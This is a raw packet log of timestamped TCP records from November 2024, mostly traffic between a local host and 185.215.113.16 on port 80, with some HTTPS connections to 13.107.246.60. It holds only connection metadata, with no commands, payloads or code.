                                                                                                                                                                        Nov 21, 2024 10:37:47.356539011 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.357300997 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.357434034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.357876062 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.358285904 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.358360052 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.358405113 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.359186888 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.359323978 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.359381914 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.360109091 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.360224962 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.360271931 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.361016989 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.361454964 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.361500025 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.361958981 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.361979008 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.362026930 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.362953901 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.363084078 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.363138914 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.363838911 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.364062071 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.364110947 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.364716053 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.364797115 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.364839077 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.365654945 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.365725994 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.365772963 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.366576910 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.407809973 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.519716978 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.519768953 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.519838095 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.520020008 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.520127058 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.520178080 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.520956993 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.521076918 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.521399021 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.521882057 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.521981001 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.522811890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.522860050 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.522926092 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.523209095 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.523758888 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.523876905 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.523929119 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.524631023 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.524749994 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.524800062 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.525521040 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.525641918 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.526715994 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.526813030 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.526815891 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.527467966 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.527523041 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.527585030 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.527630091 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.527932882 CET4434979313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.528306961 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.528429031 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.529212952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.529248953 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.529345036 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.529397964 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.530174017 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.530325890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.531052113 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.531100988 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.531167984 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.531416893 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.531985044 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.532100916 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.532150030 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.532905102 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.533000946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.533049107 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.533843040 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.534006119 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.534796953 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.534847975 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.534868002 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.535392046 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.535680056 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.535804987 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.535861969 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.536597967 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.536652088 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.537405014 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.537523031 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.537647009 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.537702084 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.538182020 CET49793443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.538214922 CET4434979313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.538511992 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.538650036 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.539036036 CET49793443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.539041996 CET4434979313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.539048910 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.539371967 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.539448977 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.539473057 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.539518118 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.540299892 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.540354013 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.540411949 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.541197062 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.541327000 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.541681051 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.542135954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.542222977 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.542273998 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.543049097 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.543245077 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.543292999 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.543991089 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.544054985 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.544105053 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.544935942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.545012951 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.545063972 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.545874119 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.545936108 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.545983076 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.546741009 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.546942949 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.547013998 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.547677994 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.547780991 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.547833920 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.548587084 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.548643112 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.548692942 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.549520969 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.549714088 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.549778938 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.550664902 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.550822020 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.550872087 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.551372051 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.551511049 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.551567078 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.552274942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.552387953 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.552438021 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.553247929 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.553282022 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.553329945 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.553412914 CET4434979213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.553563118 CET4434979213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.553663015 CET49792443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.553965092 CET49792443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.553986073 CET4434979213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.553997040 CET49792443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.554003000 CET4434979213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.554131985 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.554258108 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.554338932 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.555016041 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.555130959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.555181026 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.555955887 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.556087971 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.556152105 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.556896925 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.557001114 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.557049036 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.557820082 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.558202982 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.558749914 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.558815002 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.558856010 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.559562922 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.559644938 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.559850931 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.559895992 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.560569048 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.560767889 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.560817003 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.561530113 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.561584949 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.562484026 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.562532902 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.562556982 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.562587976 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.563337088 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.563843966 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.563891888 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.564229965 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.564296007 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.564335108 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.565211058 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.565373898 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.565428972 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.566117048 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.566226959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.566273928 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.567074060 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.567222118 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.567260981 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.567883968 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.578469038 CET49797443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.578512907 CET4434979713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.578564882 CET49797443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.579107046 CET49797443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.579123020 CET4434979713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.610928059 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.721590996 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.721668959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.721723080 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.722014904 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.722182035 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.722223043 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.722929955 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.723012924 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.723845005 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.723891973 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.723978996 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.724773884 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.724838018 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.724900961 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.724940062 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.725841045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.725853920 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.725888968 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.726974010 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.726991892 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.727045059 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.727534056 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.727658033 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.728460073 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.728501081 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.728566885 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.729389906 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.729393959 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.729543924 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.729577065 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.730300903 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.730396032 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.730446100 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.731256008 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.731343031 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.732161045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.732209921 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.732244968 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.732413054 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.733068943 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.733155966 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.733198881 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.733997107 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.734122038 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.734496117 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.734896898 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.735141039 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.735188007 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.735810041 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.735934973 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.736444950 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.736732960 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.736805916 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.737771988 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.737817049 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.737824917 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.737859011 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.738621950 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.738718033 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.738761902 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.739207029 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.739733934 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.739835024 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.739885092 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.740462065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.740595102 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.740642071 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.741374016 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.741481066 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.742331028 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.742384911 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.742407084 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.743210077 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.743268967 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.743338108 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.743382931 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.744389057 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.744534969 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.744587898 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.745590925 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.745835066 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.745882988 CET4978780192.168.2.6185.215.113.16
